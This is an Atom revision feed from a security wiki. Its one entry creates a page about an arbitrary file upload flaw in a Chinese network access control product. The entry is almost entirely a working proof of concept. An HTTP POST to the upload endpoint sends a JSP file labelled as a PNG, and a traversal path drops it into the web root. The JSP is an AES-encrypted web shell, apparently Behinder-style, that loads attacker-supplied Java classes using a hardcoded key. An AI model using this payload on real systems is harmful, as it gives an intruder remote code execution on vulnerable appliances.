<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E5%AE%89%E7%95%A5%E7%B6%B2%E7%B5%A1%E5%87%86%E5%85%A5%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%B5%B1_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E</id>
	<title>安略網絡准入控制系統 任意文件上傳漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E5%AE%89%E7%95%A5%E7%B6%B2%E7%B5%A1%E5%87%86%E5%85%A5%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%B5%B1_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E5%AE%89%E7%95%A5%E7%B6%B2%E7%B5%A1%E5%87%86%E5%85%A5%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%B5%B1_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-08T06:03:55Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E5%AE%89%E7%95%A5%E7%B6%B2%E7%B5%A1%E5%87%86%E5%85%A5%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%B5%B1_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;diff=1687&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC== &lt;pre&gt; POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: www.0-sec.org ... ...  -----------------------------570xxxxxxxxx6025274xxxxxxxx1 Content-Disposition: form...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E5%AE%89%E7%95%A5%E7%B6%B2%E7%B5%A1%E5%87%86%E5%85%A5%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%B5%B1_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;diff=1687&amp;oldid=prev"/>
		<updated>2021-04-15T10:18:20Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC== &amp;lt;pre&amp;gt; POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: www.0-sec.org ... ...  -----------------------------570xxxxxxxxx6025274xxxxxxxx1 Content-Disposition: form...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /uai/download/uploadfileToPath.htm HTTP/1.1&lt;br /&gt;
HOST: www.0-sec.org&lt;br /&gt;
... ...&lt;br /&gt;
&lt;br /&gt;
-----------------------------570xxxxxxxxx6025274xxxxxxxx1&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;input_localfile&amp;quot;; filename=&amp;quot;xxx.jsp&amp;quot;&lt;br /&gt;
Content-Type: image/png&lt;br /&gt;
&lt;br /&gt;
&amp;lt;%@page import=&amp;quot;java.util.*,javax.crypto.*,javax.crypto.spec.*&amp;quot;%&amp;gt;&amp;lt;%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%&amp;gt;&amp;lt;%if (request.getMethod().equals(&amp;quot;POST&amp;quot;)){String k=&amp;quot;e45e329feb5d925b&amp;quot;;/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(&amp;quot;u&amp;quot;,k);Cipher c=Cipher.getInstance(&amp;quot;AES&amp;quot;);c.init(2,new SecretKeySpec(k.getBytes(),&amp;quot;AES&amp;quot;));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-----------------------------570xxxxxxxxx6025274xxxxxxxx1&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;uploadpath&amp;quot;&lt;br /&gt;
&lt;br /&gt;
../webapps/notifymsg/devreport/&lt;br /&gt;
-----------------------------570xxxxxxxxx6025274xxxxxxxx1--&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>